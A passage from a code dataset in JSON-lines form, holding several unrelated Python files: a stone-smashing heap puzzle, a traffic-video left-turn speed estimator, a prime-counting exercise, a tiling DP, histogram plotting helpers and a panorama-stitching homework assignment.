destroyed;\nIf x != y, the stone of weight x is totally destroyed, and the stone of weight y has new weight y-x.\nAt the end, there is at most 1 stone left. 
Return the weight of this stone (or 0 if there are no stones left.)\n\"\"\"\nimport bisect\nimport heapq\nclass Solution(object):\n    # O(log(n) * n)\n    def lastStoneWeight(self, stones):\n        \"\"\"\n        :type stones: List[int]\n        :rtype: int\n        \"\"\"\n        stones = [-x for x in stones]\n        heapq.heapify(stones)\n        while stones and len(stones) > 1:\n            max1 = -heapq.heappop(stones)\n            max2 = -heapq.heappop(stones)\n            if max1 != max2:\n                heapq.heappush(stones, -abs(max1 - max2))\n        return -stones[0] if stones else 0\n    \"\"\"\n    O(n^2) sorted insert is O(n)\n    logn for search but O(n) for the actual insert in python list\n    \"\"\"\n    def lastStoneWeightSort(self, stones):\n        \"\"\"\n        :type stones: List[int]\n        :rtype: int\n        \"\"\"\n        stones = sorted(stones)\n        while stones and len(stones) > 1:\n            max1 = stones.pop()\n            max2 = stones.pop()\n            bisect.insort(stones, abs(max1 - max2))\n        return stones.pop() if stones else 0\n","sub_path":"simulation/merge_heaviest_stones.py","file_name":"merge_heaviest_stones.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442994297","text":"from calibration import *\nfrom util import *\nfrom yolo_func import *\nfrom copy import deepcopy\nimport pandas as pd\nfrom scipy import io as sio\n\n\ndef getSpeed(d_path, c_path, calib_L, v_path=None):\n    \"\"\"\n    Get speed of the leftturn vehicle and straight driving vehicle\n    :param d_path: detection file path\n    :param c_path: config file path\n    :param calib_L: calibration matrix\n    :param v_path: video file path, only for debug visualization\n    :return velocity_cfv: velocity of the leftturn vehicle\n    :return velocity_sdv: velocity of the straight driving vehicle\n    :return distance_sdv: distance between the leftturn vehicle and the straight driving vehicle\n    \"\"\"\n    ds, total_frame = readFile(d_path)\n    c, _ = readFile(c_path)\n    area = [c[\"lefeturn_area\"], c[\"straight_area\"]]\n    conflict_area = polygonIntersction(area[0], area[1])\n    sd_area = polygonNonIntersect(area[1], area[0])\n    frame_cf = []\n    frame_sd = []\n    timestamp = []\n    frame_num = []\n\n    # debug\n    debug_frame_cf = []\n    debug_frame_sd = []\n\n    for frame in range(total_frame):\n        in_cf = [] # conflict area\n        in_sd = [] # straight driving area\n        debug_box_cf = [] # debug\n        debug_box_sd = [] # debug\n        try:\n            for vehicle in ds[str(frame+1)][\"vehicle\"]: # frame start from 1\n                bottom_center_uv = [vehicle[0], vehicle[1]+vehicle[3]/2]\n                if pointInPolygon(bottom_center_uv, conflict_area): # conflict area\n                    bc_xyz = DLTrecon_z(bottom_center_uv, calib_L, 0) # reconstruct to 3D coord\n                    in_cf.append(bc_xyz) # in 3D, with z = 0\n                    # debug\n                    debug_box_cf.append(vehicle)\n\n                elif pointInPolygon(bottom_center_uv, sd_area): # straight driving area\n                    bc_xyz = DLTrecon_z(bottom_center_uv, calib_L, 0) # reconstruct to 3D coord\n                    in_sd.append(bc_xyz) # in 3D, with z = 0\n                    # debug\n                    debug_box_sd.append(vehicle)\n\n            if not len(in_cf) == 0 and not len(in_sd) == 0:\n                # debug\n                # if len(in_cf) > 1: # should be only one car in the conflict area\n                #     print(\"[CHECK] Frame: \", frame, \" --> More than one vehicle in conflict zone\")\n                #     box_l = deepcopy(debug_box_cf)\n                #     box_l.extend(debug_box_sd)\n                #     debug_vis(v_path, [frame], [box_l])\n                # debug\n                # if len(in_sd) > 1:\n                #     print(\"[CHECK] Frame: \", frame, \" --> More than one vehicle in straight driving zone\")\n                #     _, key = closest_sdv(in_sd)\n                #     # put the most front straight driving vehicle first, so it should be in blue\n                #     box_l = deepcopy([debug_box_sd[key]])\n                #     box_l.extend([debug_box_sd[k] for k in range(len(debug_box_sd)) if not k==key])\n                #     box_l.extend(debug_box_cf)\n                #     debug_vis(v_path, [frame], [box_l])\n\n                frame_num.append(frame)\n                frame_cf.append(in_cf[0])\n                frame_sd.append(closest_sdv(in_sd)[0]) # find the most front straight driving vehicle\n                timestamp.append(ds[str(frame+1)][\"timestamp\"])\n\n                # debug\n                debug_frame_cf.append(debug_box_cf)\n                debug_frame_sd.append(debug_box_sd)\n\n        except KeyError:\n            continue\n\n    continue_frame, cf, sd, t = continue_list(frame_num, frame_cf, frame_sd, timestamp)\n    _, debug_cf, debug_sd, _ = continue_list(frame_num, debug_frame_cf, debug_frame_sd, timestamp)\n\n    velocity_cfv, velocity_sdv, distance_sdv = [], [], []\n    for k in range(len(continue_frame)): # one video can have multiple useful pieces\n        temp_f = continue_frame[k]\n        if len(temp_f) < 50: # ignore short pieces with length < 50\n            continue\n\n        # debug visualization\n        # box_l = []\n        # for ll in range(len(debug_cf[k])):\n        #     box_l.append([])\n        #     box_l[ll].extend(debug_cf[k][ll])\n        #     box_l[ll].extend(debug_sd[k][ll])\n        # fff = os.path.splitext(os.path.basename(v_path))[0] # get file name\n        # ddd = os.path.dirname(v_path) # get dir name\n        # ppp = ddd + '/' + fff + 'detect' + str(k) + '.avi'\n        # debug_vis(v_path, temp_f, box_l,\n        #           video_o=ppp) # show all the frames in that piece with saving the detections\n        # debug_vis(v_path, temp_f, box_l) # show all the frames in that piece\n        # debug_vis(v_path, [temp_f[0]], [box_l[0]]) # show the first frame in that piece\n\n        temp_cf = cf[k]\n        temp_sd = sd[k]\n        temp_t = t[k]\n\n        # calculate the average velocity\n        temp_cfv = (np.array(temp_cf[-1]) - np.array(temp_cf[0]))/(temp_t[-1]-temp_t[0])*1e3 # t is in millisecond\n        temp_sdv = (np.array(temp_sd[-1]) - np.array(temp_sd[0]))/(temp_t[-1]-temp_t[0])*1e3 # t is in millisecond\n\n        if temp_cfv[0] > 0 and temp_cfv[1] < 0 and temp_sdv[1] > 0:\n            velocity_cfv.append(np.linalg.norm(temp_cfv))\n            velocity_sdv.append(temp_sdv[1])\n            distance_sdv.append(temp_cf[-1][1]-temp_sd[-1][1])\n\n    return velocity_cfv, velocity_sdv, distance_sdv\n\n\ndef closest_sdv(v_list):\n    \"\"\"\n    Find the most front straight driving vehicle in the v_list\n    :param v_list: list of [array], should be candidate straight driving vehicles\n    :return vehicle: the most front straight driving vehicle coord in np.array\n    \"\"\"\n    max_y = -1e10\n    key = None\n    for k, n in enumerate(v_list):\n        if n[1] > max_y:\n            max_y = n[1]\n            key = k\n\n    vehicle = v_list[key]\n    return vehicle, key\n\n\ndef continue_list(frame, lt, sd, timestamp):\n    # cut when time diff > 100 ms\n    return np.split(frame, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n           np.split(lt, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n           np.split(sd, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n           np.split(timestamp, np.where(np.diff(timestamp) > 100)[0] + 1)\n\n\ndef debug_vis(video, frame_vis, boxes_frames, video_o=None):\n    \"\"\"\n    Show video from the frame\n    :param video: video path\n    :param frame_vis: list [int], the frames you are interested in\n    :param boxes_frames: list of interested boxes with different frames, if none, put []\n    :param video_o: output video path for detections\n    :return:\n    \"\"\"\n    vs = cv2.VideoCapture(video)\n    frame_count = 0\n    color = [(255, 0, 0), (0, 0, 255), (0, 255, 0), (255, 255, 0), (0, 255, 255), (255, 255, 255), (0, 0, 0)]\n    # cv2 color space is in BGR not RGB\n    # 'blue', 'red', 'green', 'aqua', 'yellow', 'white', 'black'\n    dots = [] # store history bottom center point with corresponding color\n    writer = None\n    while vs.isOpened():\n        _, f = vs.read()\n        frame_count += 1\n        if int(frame_count) in frame_vis:\n            kk = list(frame_vis).index(int(frame_count))\n            if not boxes_frames == []:\n                boxes = boxes_frames[kk]\n                for ind, box in enumerate(boxes):\n                    centerX = box[0]\n                    centerY = box[1]\n                    w = box[2]\n                    h = box[3]\n                    x = int(centerX - (w / 2))\n                    y = int(centerY - (h / 2))\n                    # show bounding box\n                    cv2.rectangle(f, (x, y), (int(x + w), int(y + h)), color[ind], 2)\n                    # show the trajectory dots\n                    dots.append((int(centerX), int(centerY + h/2), color[ind]))\n                    for ll in dots:\n                        cv2.circle(f, ll[0:2], 5, ll[2], thickness=5)\n            cv2.imshow(\"video\", f)\n            if writer is None:\n                # initialize our video writer\n                fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n                if video_o is not None:\n                    writer = cv2.VideoWriter(video_o, fourcc, 30,\n                                             (f.shape[1], f.shape[0]), True)\n                else:\n                    writer = -1\n            if video_o is not None:\n                writer.write(f)\n\n            \"\"\"Following is for continuous playing\"\"\"\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n\n            \"\"\"Following is for pausing on each frame\"\"\"\n            # key = cv2.waitKey(0)\n            # cv2.destroyAllWindows()\n            # while key not in [ord('q'), ord('w')]:\n            #     key = cv2.waitKey(0)\n            # if key == ord('q'):\n            #     break\n\n        elif frame_count > frame_vis[-1]:\n            break\n    vs.release()\n    cv2.destroyAllWindows()\n    if video_o is not None:\n        writer.release()\n\n\n\"\"\"Start left turn\"\"\"\nshow_calib = False\nshow_area = False\n\n# Calibration\n# For left-turn00.mkv ~ 03.mkv:\nconfig_path ='./config/leftturn00.json'\nconfig, _ = readFile(config_path)\n\nleftturn00_3D = config['calib_point']['point3D']\nleftturn00_2D = config['calib_point']['point2D']\n\nL, pixel_err = Simple_DLT(leftturn00_3D, leftturn00_2D)\npoint_num = len(leftturn00_3D)\ndistance_err = []\nfor i in range(point_num):\n    z = leftturn00_3D[i][2]\n    distance_err.append(np.linalg.norm(DLTrecon_z(leftturn00_2D[i], L, z) - leftturn00_3D[i][0:2]))\n\n# show ground points\nif show_calib:\n    print(\"Mean pixel_err: \", np.mean(pixel_err))\n    print(\"Mean distance_err: \", np.mean(distance_err))\n    xz_0 = []\n    yz_0 = []\n    # print(DLTrecon_z([1132.5,591.0], L, 0)) # for get boundary point\n    for i in range(10):\n        xz_0.append([(11.6 + 6.4) / 10 * i - 6.4, 0, 0])\n        yz_0.append([0, (27 + 55) / 10 * (i + 1) - 55, 0])\n    image = './images/leftturn00/calib_leftturn.png'\n    showAxis_z0(xz_0, yz_0, L, image)\n\n\"\"\"Detection\"\"\"\nfolder = './videos/'\nyolo_path = './yolo-coco'\nextensions = ('.mp4', '.avi', '.wmv')\npre_results = './leftturn_result.json'\n\nif os.path.exists(pre_results):\n    with open(pre_results) as json_file:\n        data = json.load(json_file)\n    dict_v_t = data['v_t']\n    dict_v_sd = data['v_sd']\n    dict_d_sd = data['d_sd']\n    v_t_all, v_sd_all, d_sd_all = [], [], []\n    for i in range(len(dict_d_sd)):\n        v_t_all.append(dict_v_t[str(i)])\n        v_sd_all.append(dict_v_sd[str(i)])\n        d_sd_all.append(dict_d_sd[str(i)])\n\nelse:\n    v_t_all, v_sd_all, d_sd_all = [], [], []\n\n\nfor subdir, dirs, files in os.walk(folder):\n    for file in files:\n        ext = os.path.splitext(file)[-1].lower()\n        if ext in extensions:\n            video_in = os.path.join(subdir, file)\n            file_name = os.path.splitext(os.path.basename(video_in))[0]\n            detect_path = os.path.join(folder, file_name + \".txt\")\n            print(\"[INFO] Start detection: \", file_name, ext)\n            yolo_video(video_in, yolo_path)\n\n            v_t, v_sd, d_sd = getSpeed(detect_path, config_path, L, video_in)\n            v_t_all.extend(v_t)\n            v_sd_all.extend(v_sd)\n            d_sd_all.extend(d_sd)\n\npd_dict = {'v_t': v_t_all, 'v_sd': v_sd_all, 'd_sd': d_sd_all}\ndf = pd.DataFrame(pd_dict)\ndf.to_json(r'./leftturn_result_new.json')\n# for 
matlab\nsio.savemat(\"./leftturn_result_new.mat\",\n            {\"v_t_all\": v_t_all,\n             \"v_sd_all\": v_sd_all,\n             \"d_sd_all\": d_sd_all})\n\nif show_area:\n    config, _ = readFile(config_path)\n\n    image_with_detection = './images/leftturn00/detection.png'\n    areas = [config[\"lefeturn_area\"], config[\"straight_area\"],\n             polygonIntersction(config[\"lefeturn_area\"], config[\"straight_area\"]),\n             polygonNonIntersect(config[\"straight_area\"], config[\"lefeturn_area\"])]\n\n    showAreaImage(image_with_detection, areas)\n\nprint(\"END\")\n","sub_path":"leftturn.py","file_name":"leftturn.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"607624943","text":"from random import randint\r\n\r\ncasuali = []\r\nn = int (input (\"how many numbers from 1 to 20 should there be?\"))\r\ncontatore = n\r\ndiv = 2\r\n\r\nfor i in range (n):\r\n    numero = randint (1,20)\r\n    while numero in casuali:\r\n        numero = randint (1,20)\r\n    if numero not in casuali:\r\n        casuali.append (numero)\r\n\r\nprint (\"the list is\", casuali)\r\n\r\nfor numero in casuali:\r\n    # 1 is not prime; skip it so the trial-division loop below terminates\r\n    if numero == 1:\r\n        contatore -= 1\r\n        continue\r\n    while True:\r\n        if numero == div:\r\n            div = 2\r\n            break\r\n        elif numero % div != 0:\r\n            div += 1\r\n        else:\r\n            contatore -= 1\r\n            div = 2\r\n            break\r\nprint (\"the number of primes is\", contatore)","sub_path":"es_6.py","file_name":"es_6.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415377760","text":"def solution(n):\n    memo = [0] * (n + 1)\n    memo[1] = 1\n    memo[2] = 2\n    for i in range(3, n + 1):\n        memo[i] = (memo[i - 1] + memo[i - 2]) % 1000000007\n\n    return memo[n]\n\n\nn1 = 4\nn2 = 60000\n\nprint(solution(n1))\nprint(solution(n2))\n","sub_path":"programmers-python/연습문제/LV2_2xn_타일링.py","file_name":"LV2_2xn_타일링.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498799408","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPlotting functions for property histograms.\n\"\"\"\n\n#...for the logging.\nimport logging as lg\n\n#...for the MATH.\nimport math\n\n#...for even more MATH.\nimport numpy as np\n\n# Import the plotting libraries.\nimport pylab as plt\n\n#...for the colours. Oh, the colours!\nfrom matplotlib.colors import LogNorm\n\n# Load the LaTeX text plot libraries.\nfrom matplotlib import rc\n\n# Uncomment to use LaTeX for the plot text.\n#rc('font',**{'family':'serif','serif':['Computer Modern']})\n#rc('text', usetex=True)\n\nclass Hist():\n    \"\"\" Wrapper class for 1D property histograms. 
\"\"\"\n\n def __init__(self, name, num, data, nbins, xlabel, ylabel, outputpath):\n\n plt.close('all')\n\n ## The property histogram plot.\n p = plt.figure(num, figsize=(5.0, 3.0), dpi=150, facecolor='w', edgecolor='w')\n\n # Adjust the position of the axes.\n p.subplots_adjust(bottom=0.17, left=0.15)\n\n ## The plot axes.\n pax = p.add_subplot(111)\n\n # y axis\n plt.ylabel('%s' % (ylabel))\n\n # x axis\n plt.xlabel('%s' % (xlabel))\n\n # Add a grid.\n plt.grid(1)\n\n ## The x minimum.\n xmin = 0\n\n ## The x maximum.\n xmax = max(data) + 5\n\n if nbins < 0:\n n, bins, patches = plt.hist(data, range(int(xmin),int(xmax),1), histtype='stepfilled')\n else:\n n, bins, patches = plt.hist(data, nbins, histtype='stepfilled')\n\n # Set the plot's visual properties.\n plt.setp(patches, 'facecolor', 'g', 'alpha', 0.75, 'linewidth', 0.0)\n\n # Save the figure.\n p.savefig(\"%s/%s.png\" % (outputpath, name))\n\nclass Hist2D:\n \"\"\" Wrapper class for 2D property vs. property histograms. \"\"\"\n\n def __init__(self, num, name, x_data, x_ax_label, x_nbins, y_data, y_ax_label, y_nbins, outputpath):\n\n plt.close('all')\n\n ## The histogram plot.\n plot = plt.figure(num, figsize=(5.0, 3.0), dpi=150, facecolor='w', edgecolor='w')\n\n # Adjust the position of the axes.\n plot.subplots_adjust(bottom=0.17, left=0.15)\n\n ## The plot axes.\n plotax = plot.add_subplot(111)\n\n # Set the y axis label.\n plt.ylabel(y_ax_label)\n\n # Set the x axis label.\n plt.xlabel(x_ax_label)\n\n # Add a grid.\n plt.grid(1)\n\n # Plot the 2D histogram.\n plt.hist2d(x_data, y_data, bins=[x_nbins, y_nbins], norm=LogNorm())\n\n # Add a colour bar.\n plt.colorbar()\n\n # Save the figure.\n plot.savefig(\"%s/%s.png\" % (outputpath, name))\n","sub_path":"plotting/histograms.py","file_name":"histograms.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333629144","text":"# ASSIGNMENT 8\n# Your Name\n\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nimport cv2\n\n# Import ORB as SIFT to avoid confusion.\n# try:\n# from cv2 import ORB as SIFT\n# except ImportError:\n# try:\n# from cv2 import SIFT\n# except ImportError:\n# try:\n# SIFT = cv2.ORB_create\n# except:\n# raise AttributeError(\"Your OpenCV(%s) doesn't have SIFT / ORB.\"\n# % cv2.__version__)\n\n\n\"\"\" Assignment 8 - Panoramas\n\nThis file has a number of functions that you need to fill out in order to\ncomplete the assignment. Please write the appropriate code, following the\ninstructions on which functions you may or may not use.\n\nGENERAL RULES:\n 1. DO NOT INCLUDE code that saves, shows, displays, writes the image that\n you are being passed in. Do that on your own if you need to save the images\n but the functions should NOT save the image to file. (This is a problem\n for us when grading because running 200 files results a lot of images being\n saved to file and opened in dialogs, which is not ideal). Thanks.\n\n 2. DO NOT import any other libraries aside from the three libraries that we\n provide. You may not import anything else, you should be able to complete\n the assignment with the given libraries (and in most cases without them).\n\n 3. DO NOT change the format of this file. Do not put functions into classes,\n or your own infrastructure. This makes grading very difficult for us. 
Please\n only write code in the allotted region.\n\"\"\"\n\ndef getImageCorners(image):\n \"\"\" For an input image, return its four corners.\n\n You should be able to do this correctly without instruction. If in doubt,\n resort to the testing framework. The order in which you store the corners\n does not matter.\n\n Note: The reasoning for the shape of the array can be explained if you look\n at the documentation for cv2.perspectiveTransform which we will use on the\n output of this function. Since we will apply the homography to the corners\n of the image, it needs to be in that format.\n\n Another note: When storing your corners, they are assumed to be in the form\n (X, Y) -- keep this in mind and make SURE you get it right.\n\n Args:\n image (numpy.ndarray): Input can be a grayscale or color image.\n\n Returns:\n corners (numpy.ndarray): Array of shape (4, 1, 2). Type of values in the\n array is np.float32.\n \"\"\"\n # WRITE YOUR CODE HERE\n \n h, w = image.shape[:2]\n corners = np.array([[[0,0]], [[w,0]], [[0,h]], [[w,h]]], dtype=np.float32)\n\n return corners\n # END OF FUNCTION\n\ndef findMatchesBetweenImages(image_1, image_2, num_matches):\n \"\"\" Return the top list of matches between two input images.\n\n Note: You will not be graded for this function. This function is almost\n identical to the function in Assignment 7 (we just parametrized the number\n of matches). We expect you to use the function you wrote in A7 here. We will\n also release a solution for how to do this after A7 submission has closed.\n\n If your code from A7 was wrong, don't worry, you will not lose points in\n this assignment because your A7 code was wrong (hence why we will provide a\n solution for you after A7 closes).\n\n This function detects and computes SIFT (or ORB) from the input images, and\n returns the best matches using the normalized Hamming Distance through brute\n force matching.\n\n Args:\n image_1 (numpy.ndarray): The first image (grayscale).\n image_2 (numpy.ndarray): The second image. (grayscale).\n num_matches (int): The number of desired matches. If there are not\n enough, return as many matches as you can.\n\n Returns:\n image_1_kp (list): The image_1 keypoints, the elements are of type\n cv2.KeyPoint.\n image_2_kp (list): The image_2 keypoints, the elements are of type \n cv2.KeyPoint.\n matches (list): A list of matches, length 'num_matches'. Each item in \n the list is of type cv2.DMatch. If there are less \n matches than num_matches, this function will return as\n many as it can.\n\n \"\"\"\n\n # COPY YOUR CODE FROM A7 HERE.\n\n detector = cv2.ORB()\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n \n image_1_kp, image_1_desc = detector.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = detector.detectAndCompute(image_2, None)\n matches = matcher.match(image_1_desc, image_2_desc)\n matches = sorted(matches, key = lambda x:x.distance)\n \n# matchImg = drawMatches(image_1, image_1_kp, image_2, image_2_kp, matches[:num_matches])\n# cv2.imshow(\"matches\", matchImg.astype(np.uint8))\n# cv2.waitKey(1000)\n \n return image_1_kp, image_2_kp, matches[:num_matches]\n\n # END OF FUNCTION.\n\ndef findHomography(image_1_kp, image_2_kp, matches):\n \"\"\" Returns the homography between the keypoints of image 1, image 2, and\n its matches.\n\n Follow these steps:\n 1. Iterate through matches and:\n 1a. Get the x, y location of the keypoint for each match. Look up\n the documentation for cv2.DMatch. Image 1 is your query image,\n and Image 2 is your train image. 
Therefore, to find the correct\n x, y location, you index into image_1_kp using match.queryIdx,\n and index into image_2_kp using match.trainIdx. The x, y point\n is stored in each keypoint (look up documentation).\n 1b. Set the keypoint 'pt' to image_1_points and image_2_points, it\n should look similar to this inside your loop:\n image_1_points[match_idx] = image_1_kp[match.queryIdx].pt\n # Do the same for image_2 points.\n\n 2. Call cv2.findHomography and pass in image_1_points, image_2_points,\n use method=cv2.RANSAC and ransacReprojThreshold=5.0. I recommend\n you look up the documentation on cv2.findHomography to better\n understand what these parameters mean.\n 3. cv2.findHomography returns two values, the homography and a mask.\n Ignore the mask, and simply return the homography.\n\n Args:\n image_1_kp (list): The image_1 keypoints, the elements are of type\n cv2.KeyPoint.\n image_2_kp (list): The image_2 keypoints, the elements are of type \n cv2.KeyPoint.\n matches (list): A list of matches. Each item in the list is of type\n cv2.DMatch.\n Returns:\n homography (numpy.ndarray): A 3x3 homography matrix. Each item in\n the matrix is of type numpy.float64.\n \"\"\"\n image_1_points = np.zeros((len(matches), 1, 2), dtype=np.float32)\n image_2_points = np.zeros((len(matches), 1, 2), dtype=np.float32)\n\n # WRITE YOUR CODE HERE.\n \n for i, match in enumerate(matches):\n image_1_points[i] = image_1_kp[match.queryIdx].pt\n image_2_points[i] = image_2_kp[match.trainIdx].pt\n \n H, mask = cv2.findHomography(image_1_points, image_2_points, method=cv2.RANSAC, ransacReprojThreshold=5.0)\n \n return H\n # END OF FUNCTION\n\ndef blendImagePair(warped_image, image_2, point):\n \"\"\" This is the blending function. We provide a basic implementation of\n this function that we would like you to replace.\n\n This function takes in an image that has been warped and an image that needs\n to be inserted into the warped image. Lastly, it takes in a point where the\n new image will be inserted.\n\n The current method we provide is very simple, it pastes in the image at the\n point. We want you to replace this and blend between the images.\n\n We want you to be creative. 
The most common implementation would be to take\n the average between image 1 and image 2 only for the pixels that overlap.\n That is just a starting point / suggestion but you are encouraged to use\n other approaches.\n\n Args:\n warped_image (numpy.ndarray): The image provided by cv2.warpPerspective.\n image_2 (numpy.ndarray): The image to insert into the warped image.\n point (numpy.ndarray): The point (x, y) to insert the image at.\n\n Returns:\n image: The warped image with image_2 blended into it.\n \"\"\"\n \n # need to generate a properly sized and translated image_2\n image_2_resize = np.zeros(warped_image.shape, dtype=np.uint8)\n image_2_resize[point[1]:image_2.shape[0]+point[1], \\\n point[0]:image_2.shape[1]+point[0]] = image_2\n \n # find the binary union of the two images\n warpGrey = cv2.cvtColor(warped_image, cv2.COLOR_BGR2GRAY)\n image2Grey = cv2.cvtColor(image_2_resize, cv2.COLOR_BGR2GRAY)\n warpMask = 1 - np.logical_not(warpGrey)\n image2Mask = 1 - np.logical_not(image2Grey)\n unionMask = np.logical_and(warpGrey, image2Grey)\n \n # find the extents of the union, column-wise\n colSum = np.sum(unionMask, axis = 0)\n start = np.where(colSum != 0)[0][0]\n end = np.where(colSum != 0)[0][-1]\n \n # create a weighting image based on the union and a gradient across the columns\n weight = np.zeros(warpGrey.shape, dtype=np.float32)\n for i, col in enumerate(unionMask.T[start:end]):\n weight[:,start+i] = col * (1 - i / float(end-start))\n \n # create a weighted image mask for image_2 \n image2Mask = image2Mask.astype(np.float32) - weight\n \n # apply the weighting to blend the images\n output_image = np.zeros(warped_image.shape, dtype=np.uint8)\n if len(warped_image.shape) == 3:\n for i in range(warped_image.shape[2]):\n output_image[:,:,i] = (1 - image2Mask) * warped_image[:,:,i] + image2Mask * image_2_resize[:,:,i]\n else:\n output_image = (1 - image2Mask) * warped_image + image2Mask * image_2_resize \n\n return output_image\n # END OF FUNCTION\n\ndef warpImagePair(image_1, image_2, homography):\n \"\"\" Warps image 1 so it can be blended with image 2 (stitched).\n\n Follow these steps:\n 1. Obtain the corners for image 1 and image 2 using the function you\n wrote above.\n \n 2. Transform the perspective of the corners of image 1 by using the\n image_1_corners and the homography to obtain the transformed corners.\n \n Note: Now we know the corners of image 1 and image 2. Out of these 8\n points (the transformed corners of image 1 and the corners of image 2),\n we want to find the minimum x, maximum x, minimum y, and maximum y. We\n will need this when warping the perspective of image 1.\n\n 3. Join the two corner arrays together (the transformed image 1 corners,\n and the image 2 corners) into one array of size (8, 1, 2).\n\n 4. For the first column of this array, find the min and max. This will\n be your minimum and maximum X values. Store into x_min, x_max.\n\n 5. For the second column of this array, find the min and max. This will\n be your minimum and maximum Y values. Store into y_min, y_max.\n\n 6. Create a translation matrix that will shift the image by the required\n x_min and y_min (should be a numpy.ndarray). This looks like this:\n [[1, 0, -1 * x_min],\n [0, 1, -1 * y_min],\n [0, 0, 1]]\n\n Note: We'd like you to explain the reasoning behind multiplying the\n x_min and y_min by negative 1 in your writeup.\n\n 7. Compute the dot product of your translation matrix and the homography\n in order to obtain the homography matrix with a translation.\n\n 8. 
Then call cv2.warpPerspective. Pass in image 1, the dot product of\n the matrix computed in step 6 and the passed in homography and a vector\n that will fit both images, since you have the corners and their max and\n min, you can calculate it as (x_max - x_min, y_max - y_min).\n\n 9. To finish, you need to blend both images. We have coded the call to\n the blend function for you.\n\n Args:\n image_1 (numpy.ndarray): Left image.\n image_2 (numpy.ndarray): Right image.\n homography (numpy.ndarray): 3x3 matrix that represents the homography\n from image 1 to image 2.\n\n Returns:\n output_image (numpy.ndarray): The stitched images.\n \"\"\"\n # WRITE YOUR CODE HERE\n\n # find image corners\n corners_1 = getImageCorners(image_1)\n corners_2 = getImageCorners(image_2)\n \n # transform image 1 corners to find the extents of the warped image\n for i, c in enumerate(corners_1[:,0,:]):\n cWarp = np.dot(homography, [c[0], c[1], 1.0])\n# corners_1[i,0,:] = cWarp[:2] \n corners_1[i,0,:] = cWarp[:2] / cWarp[2]\n \n #corners_1 = cv2.perspectiveTransform(corners_1, homography) \n \n # find max and min image coordinates\n corners = np.concatenate((corners_1, corners_2))\n x_min = min(corners[:,0,0])\n x_max = max(corners[:,0,0])\n y_min = min(corners[:,0,1])\n y_max = max(corners[:,0,1])\n \n # create translation matrix to shift the warped image back in view\n T = np.array([[1, 0, -x_min], \\\n [0, 1, -y_min], \\\n [0, 0, 1]])\n \n # combine homography with translation\n TH = np.dot(T, homography)\n \n # warp and translate image 1 \n #ySize = max(max(corners_1[:,0,1]) - min(corners_1[:,0,1]), image_2.shape[0])\n #xSize = int(image_2.shape[1] - x_min)\n ySize = y_max - y_min\n xSize = x_max - x_min\n warped_image = cv2.warpPerspective(image_1, TH, (xSize, ySize))\n\n # END OF CODING\n output_image = blendImagePair(warped_image, image_2,\n (-1 * x_min, -1 * y_min))\n\n return output_image\n\ndef drawMatches(image_1, image_1_keypoints, image_2, image_2_keypoints, matches):\n\n # Compute number of channels.\n num_channels = 1\n if len(image_1.shape) == 3:\n num_channels = image_1.shape[2]\n \n # Separation between images.\n margin = 10\n \n # Create an array that will fit both images (with a margin of 10 to separate the two images)\n joined_image = np.zeros((max(image_1.shape[0], image_2.shape[0]),\n image_1.shape[1] + image_2.shape[1] + margin,\n num_channels))\n \n if num_channels != 1:\n for channel_idx in range(num_channels):\n joined_image[:image_1.shape[0],\n :image_1.shape[1],\n channel_idx] = image_1[:,:,channel_idx]\n joined_image[:image_2.shape[0],\n image_1.shape[1] + margin:,\n channel_idx] = image_2[:,:,channel_idx]\n else:\n joined_image[:image_1.shape[0], :image_1.shape[1]] = image_1\n joined_image[:image_2.shape[0], (image_1.shape[1] + margin):] = image_2\n\n for match in matches:\n image_1_point = (int(image_1_keypoints[match.queryIdx].pt[0]),\n int(image_1_keypoints[match.queryIdx].pt[1]))\n image_2_point = (int(image_2_keypoints[match.trainIdx].pt[0] + \\\n image_1.shape[1] + margin),\n int(image_2_keypoints[match.trainIdx].pt[1]))\n\n cv2.circle(joined_image, image_1_point, 5, (0, 0, 255), thickness = -1)\n cv2.circle(joined_image, image_2_point, 5, (0, 255, 0), thickness = -1)\n cv2.line(joined_image, image_1_point, image_2_point, (255, 0, 0), \\\n thickness = 1)\n return joined_image\n\n# Some simple testing.\nif __name__ == \"__main__\":\n\n image_1 = cv2.imread(\"images/source/panorama_1/IMG_2524s.jpg\")\n image_2 = cv2.imread(\"images/source/panorama_1/IMG_2525s.jpg\")\n image_1_kp, 
